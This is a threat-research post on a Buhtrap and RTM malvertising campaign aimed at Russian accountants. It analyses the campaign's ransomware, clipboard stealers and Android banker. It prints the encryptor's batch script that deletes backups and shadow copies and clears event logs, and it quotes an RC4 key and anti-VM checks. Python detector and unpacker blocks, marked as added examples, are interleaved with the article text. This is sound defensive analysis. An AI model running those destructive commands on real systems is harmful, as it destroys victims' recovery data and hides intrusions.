Buhtrap backdoor and encryptor distributed via Yandex.Direct

To target accountants in a cyberattack, you can use the work documents they search for online. This is roughly what a cybergroup has been doing over the past few months, distributing the known backdoors Buhtrap and RTM, as well as encryptors and cryptocurrency-stealing software. Most of the targets are located in Russia. The attack was carried out by placing malicious advertising on Yandex.Direct. Potential victims were directed to a website where they were asked to download a malicious file disguised as a document template. Yandex removed the malicious advertising after our warning.

The Buhtrap source code was leaked online in the past, so anyone can use it. We have no information about the availability of the RTM code.

In this post we describe how the attackers distributed malware using Yandex.Direct and hosted it on GitHub. The post concludes with a technical analysis of the malware.


Buhtrap and RTM are back in business

Distribution method and victims

The various payloads delivered to victims share the same distribution method. All the malicious files created by the attackers were hosted in two different GitHub repositories.

Typically, the repository contained one downloadable malicious file, which changed frequently. Since GitHub lets you view a repository's change history, we can see which malware was distributed during a given period. To convince the victim to download the malicious file, the website blanki-shabloni24[.]ru, shown in the image above, was used.

The site design and all the malicious file names follow one concept: forms, templates, contracts, samples, etc. Given that Buhtrap and RTM had already been used in attacks on accountants in the past, we assumed the scheme of the new campaign was the same. The only question was how the victim reached the attackers' website.

Malvertising

At least several potential victims who ended up on this site were attracted by malicious advertisements. Below is an example URL:

https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=скачать бланк счета&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456

As you can see from the link, the banner was posted on the legitimate accounting forum bb.f2[.]kz. It is important to note that the banners appeared on different sites, all with the same campaign id (blanki_rsya), and most of them related to accounting or legal assistance services. The URL shows that the potential victim used the query "download invoice form", which supports our hypothesis of targeted attacks. Below are the sites on which the banners appeared, along with the corresponding search queries.

  • download invoice form – bb.f2[.]kz
  • sample contract – Ipopen[.]ru
  • sample claim application – 77metrov[.]ru
  • contract form – blank-dogovor-kupli-prodazhi[.]ru
  • sample court application – zen.yandex[.]ru
  • sample complaint – yurday[.]ru
  • sample contract forms – Regforum[.]ru
  • contract form – assistentus[.]ru
  • sample apartment contract – napravah[.]com
  • sample legal contracts – avito[.]ru

The blanki-shabloni24[.]ru site can be considered to pass a simple visual check. Usually, an ad pointing to a professional-looking site with a link to GitHub does not look like anything obviously bad. In addition, the attackers uploaded malicious files to the repository only for a limited time, probably during the campaign. Most of the time, the GitHub repository contained an empty zip or an empty EXE file. Thus, the attackers could distribute advertising via Yandex.Direct on sites most likely visited by accountants arriving in response to specific search queries.

Next, let's look at the various payloads distributed this way.

Payload analysis

Distribution timeline

The malicious campaign began at the end of October 2018 and is still active at the time of writing. Since the entire repository was publicly available on GitHub, we compiled an exact timeline of the distribution of six different malware families (see the figure below). We added a line showing when the banner link was detected, as measured by ESET telemetry, for comparison with the git history. As you can see, this correlates well with the availability of the payload on GitHub. The discrepancy at the end of February can be explained by the fact that we did not have part of the change history, because the repository was removed from GitHub before we could retrieve it completely.

Figure 1. Timeline of malware distribution events.

Code-signing certificates

The campaign used several certificates. Some of them signed more than one malware family, which indicates that the different samples belonged to the same campaign. Despite having the private key, the operators did not sign the binaries systematically and did not use the key for all samples. At the end of February 2019, the attackers began creating invalid signatures using a Google certificate for which they did not have the private key.

All the certificates involved in the campaign, and the malware families they signed, are listed in the table below.

[Table of code-signing certificates and the malware families they signed: reproduced as an image in the original post]

We also used these code-signing certificates to establish links with other malware families. For most certificates, we found no samples that were not distributed via the GitHub repository. However, the certificate of TOV "MARIYA" was used to sign malware of the Wauchos botnet, adware and miners. It is unlikely that this malware is related to this campaign. Most likely, the certificate was bought on the darknet.

Win32/Filecoder.Buhtrap

The first component that caught our attention was the newly discovered Win32/Filecoder.Buhtrap. This is a Delphi binary, which is sometimes packed. It was distributed mainly in February–March 2019. It behaves as a ransomware program should: it searches local drives and network folders and encrypts the files it finds. It does not need an Internet connection to compromise a machine, because it does not contact a server to send encryption keys. Instead, it appends a "token" to the end of the ransom note and suggests using email or Bitmessage to contact the operators.

To encrypt as many valuable resources as possible, Filecoder.Buhtrap runs a thread designed to shut down key software that may hold open file handles on files containing valuable information, which could interfere with encryption. The targeted processes are mainly database management systems (DBMS). In addition, Filecoder.Buhtrap deletes log files and backups to make data recovery more difficult. To do this, it uses the batch script below.

bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"
attrib "%userprofile%\documents\Default.rdp" -s -h
del "%userprofile%\documents\Default.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
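As an added example (not code from the article or from ESET), the following Python detector scans process-creation command lines for the recovery-inhibition and log-clearing commands in the script above. The sample log lines are constructed; the ATT&CK technique labels in the rules are my own mapping, not the article's. The key design point is the batch-level alert: each command on its own can be legitimate administration, but several of them from one host in a short window is the ransomware pattern.

```python
import re

# Constructed sample command lines, shaped like the CommandLine field of
# Sysmon Event ID 1 or an EDR process-creation event. Not taken from the article.
SAMPLE_COMMAND_LINES = [
    "bcdedit /set {default} bootstatuspolicy ignoreallfailures",
    "bcdedit /set {default} recoveryenabled no",
    "wbadmin delete catalog -quiet",
    "wmic shadowcopy delete",
    "vssadmin delete shadows /all /quiet",
    'reg delete "HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers" /f',
    "wevtutil.exe clear-log Security",
    "sc config eventlog start=disabled",
    "vssadmin list shadows",                          # benign: read-only
    "wevtutil.exe qe Security /c:5",                  # benign: queries, does not clear
    "C:\\Windows\\System32\\svchost.exe -k netsvcs",  # benign
]

# (rule name, ATT&CK technique, pattern). The technique mapping is added here
# for context; the article itself does not cite technique IDs.
RULES = [
    ("shadow_copy_deletion", "T1490 Inhibit System Recovery",
     re.compile(r"\b(?:vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete)\b", re.I)),
    ("backup_catalog_deletion", "T1490 Inhibit System Recovery",
     re.compile(r"\bwbadmin(?:\.exe)?\s+delete\s+(?:catalog|systemstatebackup|backup)\b", re.I)),
    ("boot_recovery_disabled", "T1490 Inhibit System Recovery",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*?(?:recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b", re.I)),
    ("event_log_cleared", "T1070.001 Clear Windows Event Logs",
     re.compile(r"\bwevtutil(?:\.exe)?\s+(?:cl|clear-log)\s+\S+", re.I)),
    ("event_log_service_disabled", "T1562.002 Disable Windows Event Logging",
     re.compile(r"\bsc(?:\.exe)?\s+config\s+eventlog\s+start\s*=\s*disabled\b", re.I)),
    ("rdp_history_wiped", "T1070 Indicator Removal",
     re.compile(r"\breg(?:\.exe)?\s+delete\b.*terminal server client", re.I)),
]


def match_rules(cmdline):
    """Names of every rule the command line matches (empty list if none)."""
    return [name for name, _technique, pattern in RULES if pattern.search(cmdline)]


def hunt(cmdlines, threshold=3):
    """Scan a batch of command lines from one host or process tree over a short window.

    Returns (hits, alert). hits lists (cmdline, [rule names]) for matching lines.
    alert is True when at least `threshold` distinct rules fire: any single
    command can be legitimate administration, but several recovery-inhibition
    and log-clearing commands together is the pattern of the script above."""
    hits = []
    for cmdline in cmdlines:
        names = match_rules(cmdline)
        if names:
            hits.append((cmdline, names))
    distinct = {name for _cmd, names in hits for name in names}
    return hits, len(distinct) >= threshold


if __name__ == "__main__":
    hits, alert = hunt(SAMPLE_COMMAND_LINES)
    for cmdline, names in hits:
        print(f"{', '.join(names):28} {cmdline}")
    print("ALERT" if alert else "no alert")
```

Run against the constructed batch, eight of the eleven lines match six distinct rules and the batch alert fires; a lone `vssadmin delete shadows` does not, which is the intended trade-off between noise and coverage.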

Filecoder.Buhtrap uses the legitimate online service IP Logger, designed to collect information about website visitors. This is intended to track the ransomware's victims and is handled by the following command line:

mshta.exe "javascript:document.write('');"

Files to encrypt are selected if they do not match three exclusion lists. First, files with the following extensions are not encrypted: .com, .cmd, .cpl, .dll, .exe, .hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys and .bat. Second, all files whose full path contains one of the directory strings in the list below are excluded.

.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
google\chrome
google
boot
application data
apple computer\safari
appdata
all users
:\windows
:\system volume information
:\nvidia
:\intel

Third, certain file names are also excluded from encryption, among them the name of the ransom note file. The list is given below. Obviously, all these exclusions are intended to keep the machine running, but with minimal usability.

boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe

File encryption process

Once executed, the malware generates a 512-bit RSA key pair. The private exponent (d) and modulus (n) are then encrypted with a hard-coded 2048-bit public key (public exponent and modulus), zlib-packed and base64 encoded. The code responsible for this is shown in Figure 2.

Figure 2. Hex-Rays decompiler output of the 512-bit RSA key pair generation routine.

Below is an example of the plaintext containing the generated private key, which is the token appended to the ransom note.

DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239

The attackers' public key is given below.

e = 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
n = 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

Files are encrypted using AES-128-CBC with a 256-bit key. For each encrypted file, a new key and a new initialization vector are generated. The key information is appended to the end of the encrypted file. Let's look at the format of an encrypted file.
Encrypted files have the following header:

[Encrypted file header layout: reproduced as an image in the original post]

The source file data plus the appended VEGA magic value are encrypted in the first 0x5000 bytes. All the decryption information is appended to the file in the following structure:

[Appended decryption-information structure: reproduced as an image in the original post]

- file size marker with a flag indicating whether the file is larger than 0x5000 bytes
- AES key blob = ZlibCompress(RSAEncrypt(AES key + IV, generated RSA public key))
- RSA key blob = ZlibCompress(RSAEncrypt(generated RSA private key, hard-coded RSA public key))

Win32/ClipBanker

Win32/ClipBanker is a component that was distributed intermittently from late October to early December 2018. Its role is to monitor the clipboard contents, looking for cryptocurrency wallet addresses. Having identified a target wallet address, ClipBanker replaces it with an address believed to belong to the operators. The samples we examined were neither packed nor obfuscated. The only mechanism used to mask behaviour is string encryption. The operators' wallet addresses are encrypted with RC4. The targeted cryptocurrencies are Bitcoin, Bitcoin Cash, Dogecoin, Ethereum and Ripple.

During the period when the malware was spreading, only a small amount was sent to the attackers' Bitcoin wallets, which casts doubt on the success of this campaign. In addition, there is no evidence that these transactions were related to ClipBanker at all.

Win32/RTM

The Win32/RTM component was distributed for several days in early March 2019. RTM is a banking Trojan written in Delphi, aimed at remote banking systems. In 2017, ESET researchers published a detailed analysis of this program, and the description is still relevant. In January 2019, Palo Alto Networks also released a blog post about RTM.

Buhtrap Loader

For some time, a loader was present on GitHub that did not resemble previous Buhtrap tools. It contacts https://94.100.18[.]67/RSS.php?<some_id> to retrieve the next stage and loads it directly into memory. We can distinguish two behaviours of the second-stage code. In the first case, RSS.php delivered the Buhtrap backdoor directly; this backdoor is very similar to the one available after the source code leak.

Interestingly, we see several campaigns using the Buhtrap backdoor, and they are believed to be run by different operators. In this case, the main difference is that the backdoor is loaded directly into memory and does not use the usual scheme with the DLL deployment process we discussed earlier. In addition, the operators changed the RC4 key used to encrypt network traffic to the C&C server. In most of the campaigns we have seen, the operators did not bother to change this key.

The second, more complex behaviour was that the RSS.php URL was passed to another loader. It implemented some obfuscation, such as rebuilding the dynamic import table. The purpose of this loader is to contact the C&C server msiofficeupd[.]com/api/F27F84EDA4D13B15/2, send logs and wait for a response. It treats the response as a blob, loads it into memory and executes it. The payload we observed being run by this loader was also the Buhtrap backdoor, but there may be other components.

Android/Spy.Banker

Interestingly, an Android component was also found in the GitHub repository. It was in the master branch for just one day, on 1 November 2018. Apart from its being posted on GitHub, ESET telemetry found no evidence that this malware was distributed.

The component was hosted as an Android Application Package (APK). It is heavily obfuscated. The malicious behaviour is hidden in an encrypted JAR located inside the APK. It is encrypted with RC4 using this key:

key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]

The same key and algorithm are used to encrypt strings. The JAR is located at APK_ROOT + image/files. The first 4 bytes of the file contain the length of the encrypted JAR, which starts immediately after the length field.
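As an added example (not code from the article or from ESET), the following Python unpacker reconstructs the container described above: a 4-byte length field followed by the RC4-encrypted JAR, decrypted with the key quoted in the article. The article does not state the byte order of the length field, so little-endian is an assumption made here; the stand-in JAR bytes are constructed and the unpacker sanity-checks the result by requiring the ZIP magic, which is how an analyst notices a wrong key or wrong byte order.

```python
import struct

# RC4 key quoted in the article for the encrypted JAR and the strings of the Android component.
RC4_KEY = bytes([
    0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
    0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
    0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96,
])


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (key scheduling followed by keystream generation).
    The cipher is symmetric, so the same function encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def extract_jar(blob: bytes, key: bytes = RC4_KEY) -> bytes:
    """Unpack the container the article describes: a 4-byte length field followed
    immediately by the RC4-encrypted JAR. The article does not state the byte
    order of the length field; little-endian is an assumption made here."""
    if len(blob) < 4:
        raise ValueError("blob shorter than the 4-byte length field")
    (length,) = struct.unpack("<I", blob[:4])
    if length > len(blob) - 4:
        raise ValueError(f"length field {length} exceeds available data ({len(blob) - 4} bytes)")
    jar = rc4(key, blob[4:4 + length])
    # A JAR is a ZIP archive, so a correct decryption must start with the ZIP local-header magic.
    if jar[:2] != b"PK":
        raise ValueError("decrypted data is not a ZIP/JAR: wrong key or wrong byte order")
    return jar


# Constructed stand-in for a JAR: ZIP local-header magic plus filler. Not real malware content.
FAKE_JAR = b"PK\x03\x04" + b"\x00" * 26 + b"META-INF/MANIFEST.MF"


def build_sample_blob(jar: bytes = FAKE_JAR, key: bytes = RC4_KEY) -> bytes:
    """Constructed test input in the same container format, with trailing bytes
    after the JAR to show that the length field, not the blob size, is honoured."""
    return struct.pack("<I", len(jar)) + rc4(key, jar) + b"\xAA" * 8


if __name__ == "__main__":
    recovered = extract_jar(build_sample_blob())
    print("recovered JAR:", recovered[:4], len(recovered), "bytes")
```

On a real sample you would read `image/files` from the unpacked APK, pass its bytes to `extract_jar`, and if the ZIP-magic check fails, try `">I"` for the length field before suspecting the key.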

After decrypting the file, we found that it was Anubis, a previously documented banker for Android. The malware has the following features:

  • microphone recording
  • taking screenshots
  • obtaining GPS coordinates
  • keylogger
  • device data encryption and ransom demand
  • sending spam

Interestingly, the banker used Twitter as a backup communication channel to obtain another C&C server. The sample we analysed used the account @JonesTrader, but at the time of analysis it was already blocked.

The banker contains a list of target applications on the Android device. It is longer than the list found in the Sophos study. The list includes many banking applications, online shopping programs such as Amazon and eBay, and cryptocurrency services.

MSIL/ClipBanker.IH

The last component distributed as part of this campaign is a .NET Windows executable that appeared in March 2019. Most of the versions studied were packed with ConfuserEx v1.0.0. Like ClipBanker, this component uses the clipboard. Its target is a wide range of cryptocurrencies, as well as offers on Steam. In addition, it uses the IP Logger service to steal the private Bitcoin WIF key.

Protection mechanisms

In addition to the benefits provided by ConfuserEx in preventing debugging, dumping and tampering, the component includes the ability to detect antivirus products and virtual machines.

To determine whether it is running on a virtual machine, the malware uses the Windows WMI command line (WMIC) to request BIOS information, namely:

wmic bios

The program then splits the command output and looks for the keywords VBOX, VirtualBox, XEN, qemu, bochs and VM.

To detect antivirus products, the malware sends a Windows Management Instrumentation (WMI) request to the Windows Security Center using the ManagementObjectSearcher API, as shown below. After decoding from base64, the call looks like this:

ManagementObjectSearcher('root\SecurityCenter2', 'SELECT * FROM AntivirusProduct')

Figure 3. Antivirus product detection process.

In addition, the malware checks whether CryptoClipWatcher, a tool for protecting against clipboard attacks, is running and, if so, suspends all threads in that process, thereby disabling the protection.

Persistence

The version of the malware we studied copies itself to %APPDATA%\google\updater.exe and sets the "hidden" attribute on the google directory. It then changes the value Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell in the Windows registry and appends the path to updater.exe. This way the malware is executed every time the user logs in.

Malicious behaviour

Like ClipBanker, the malware monitors the clipboard contents, looking for cryptocurrency wallet addresses, and when it finds one, replaces it with one of the operator's addresses. Below is the list of targeted address types, based on what was found in the code.

BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL

For each address type there is a corresponding regular expression. The STEAM_URL value is used to attack the Steam system, as can be seen from the regular expression used to define the match:

\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b
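As an added example (not code from the article or from ESET), the following Python detector shows the other side of this clipboard-replacement behaviour: the sequence a clipboard hijacker leaves behind is a user copy of an address, followed moments later by a different process writing a different value of the same address type. It assumes a monitor that records, for each clipboard update, the time, the new text and the process that set it (on Windows, the clipboard owner). The Steam pattern is the one quoted above; the Bitcoin Base58 pattern, the process names and the clipboard trace are constructed for the example.

```python
import re
from dataclasses import dataclass

# Regular expression quoted in the article for the STEAM_URL address type.
STEAM_TRADE_URL = re.compile(
    r"\b(https://|http://|)steamcommunity\.com/tradeoffer/new/\?partner=[0-9]+&token=[a-zA-Z0-9]+\b")

# Added for illustration only: a Base58 pattern for legacy Bitcoin addresses
# (P2PKH starting with 1, P2SH starting with 3). Assumed here, not taken from the malware.
BTC_BASE58 = re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b")

PATTERNS = {"STEAM_URL": STEAM_TRADE_URL, "BTC_BASE58": BTC_BASE58}


@dataclass
class ClipEvent:
    t: float        # seconds since the monitor started
    content: str    # new clipboard text
    writer: str     # process that set the clipboard (the clipboard owner on Windows)


@dataclass
class SwapAlert:
    kind: str
    original: str
    replacement: str
    writer: str
    delay: float


def address_type(text):
    """Return the address type the text matches, or None."""
    for name, pattern in PATTERNS.items():
        if pattern.search(text):
            return name
    return None


def detect_swaps(events, window=2.0):
    """Flag a clipboard update that replaces a just-copied value with a different
    value of the same address type, written by a different process within `window`
    seconds. A user re-copying the same value, or copying unrelated text, is ignored."""
    alerts = []
    prev = None
    for ev in sorted(events, key=lambda e: e.t):
        kind = address_type(ev.content)
        if prev is not None and kind is not None:
            same_type = address_type(prev.content) == kind
            if (same_type and ev.content != prev.content
                    and ev.writer != prev.writer and ev.t - prev.t <= window):
                alerts.append(SwapAlert(kind, prev.content, ev.content, ev.writer, ev.t - prev.t))
        prev = ev
    return alerts


# Constructed clipboard trace. Addresses, tokens and process names are made up for the example.
SAMPLE_EVENTS = [
    ClipEvent(0.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", "chrome.exe"),
    ClipEvent(0.3, "1Ez69SnzzmePmZX3WpEzMKTrcBF2gpNQ55", "updater.exe"),   # swap
    ClipEvent(10.0, "https://steamcommunity.com/tradeoffer/new/?partner=123456&token=AbCd1234", "chrome.exe"),
    ClipEvent(10.2, "https://steamcommunity.com/tradeoffer/new/?partner=987654&token=ZyXw9876", "updater.exe"),  # swap
    ClipEvent(20.0, "meeting notes", "notepad.exe"),
    ClipEvent(21.0, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", "chrome.exe"),
    ClipEvent(21.5, "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2", "chrome.exe"),   # same value again: not a swap
]


if __name__ == "__main__":
    for a in detect_swaps(SAMPLE_EVENTS):
        print(f"{a.kind}: {a.original} -> {a.replacement} by {a.writer} after {a.delay:.1f}s")
```

The writer check matters: the same value is often written twice by the copying application itself, so only a change of value, same type, different writer and short delay together make a confident swap finding.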

Exfiltration channel

In addition to replacing addresses in the clipboard, the malware targets the private WIF keys of Bitcoin, Bitcoin Core and Electrum Bitcoin wallets. The program uses iplogger.org as an exfiltration channel for the WIF private key. To do this, the operators place the private key data in the User-Agent HTTP header, as shown below.

Figure 4. IP Logger console with exfiltrated data.

The operators did not use iplogger.org to exfiltrate wallets. They probably resorted to a different method because of the 255-character limit on the User-Agent field displayed in the IP Logger web interface. In the samples we studied, another exfiltration server was stored in the DiscordWebHook environment variable. Surprisingly, this environment variable is not assigned anywhere in the code. This suggests that the malware is still under development and that the variable is assigned on the operator's test machine.

There is another sign that the program is under development. The binary includes two iplogger.org URLs, and both are queried when data is exfiltrated. In the request to one of these URLs, the value in the Referer field is prefixed with "DEV /". We also found a version not packed with ConfuserEx, in which the recipient of this URL is named DevFeedbackUrl. Based on the environment variable name, we believe the operators plan to use the legitimate Discord service and its web hook system to steal cryptocurrency wallets.

Conclusion

This campaign is an example of the use of legitimate advertising services in cyberattacks. The scheme targets Russian organizations, but we would not be surprised to see such an attack using non-Russian services. To avoid compromise, users must be confident in the reputation of the source of the software they download.

The full list of indicators of compromise and MITRE ATT&CK techniques is available at the link.

Source: www.habr.com
